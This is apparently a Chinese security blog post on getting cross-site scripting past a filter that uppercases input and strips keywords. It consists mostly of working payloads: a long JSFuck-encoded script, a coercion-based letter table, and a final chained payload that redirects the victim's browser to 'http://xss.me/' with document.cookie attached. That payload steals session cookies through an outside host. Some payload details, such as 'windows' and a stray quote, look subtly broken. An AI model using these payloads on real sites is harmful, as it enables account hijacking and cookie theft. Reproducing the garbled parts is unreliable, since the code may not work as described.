0x00 Question

某次遇到的XSS,它将所输入的所有字母均使用PHP转换为大写,并且过滤了入src等关键字以及各种标签。

0x01 Some Links

http://holyvier.blogspot.jp/2011/09/javascript-obfuscation-part-2-strings.html

http://holyvier.blogspot.jp/2011/10/javascript-obfuscation-getting-window.html

http://holyvier.blogspot.jp/2015/05/northsec-xss-challenge-writeups.html

0x02 JSFuck bypass Uppercase

如果输入没有对输入长度进行限制,即可使用JsFuck编码进行绕过

<script>alert(1)</script>

<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()<script>

0x03 字符串拼接绕过Uppercase

js在执行一些运算的时候,可能会出现一些类似于NaN之类的字符并保存在变量中,如:

那么通过这样我们可以得到自己想要的字符串并拼凑起来执行到自己想要的命令,如:

下面是字母对照表

a    (!1+"")[1]
b    (1+{})[3]
c    (1+{})[6]
d    ([][[]]+"")[2]
e    ([][[]]+"")[3]
f    ([][[]]+"")[4]
i    ([][[]]+"")[5]
j    (1+{})[4]
l    (!1+"")[2]
m*  (1..constructor+"")[11]
n    ([][[]]+"")[1]
o    (1+{})[2]
r    (!0+"")[1]
s    (!1+"")[3]
t    (!0+"")[0]
u    ([][[]]+"")[0]
v*  ([].sort+"")[23]
y    (1/0+"")[7]

该方式利用可通过constructor和toString这两个函数.

通过constructor形成一个空的构造函数可以执行任意代码

toString可以通过进制转换拼接得到任意字符,如十进制转换为三十六进制:

17795081 -> alert
1966241552 -> windows
1698633989591 -> location
1071753937337 -> document
767051222 -> cookie

如此拼接可得到想要的payload,如:

完整利用为:

$=(1+{})[6]+(1+{})[2]+([][[]]+"")[1]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[0]+(1+{})[6]+(!0+"")[0]+(1+{})[2]+(!0+"")[1];

$$=[][$][$];

_=(!0+"")[0]+(1+{})[2]+"S"+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[5]+([][[]]+"")[1]+(""[$]+"")[14];

$$(1966241552[_](36)+"."+1698633989591[_](36)+"="http://xss.me/"+"+1071753937337[_](36)+"."+767051222[_](36))();

以上,感谢VV大哥的帮助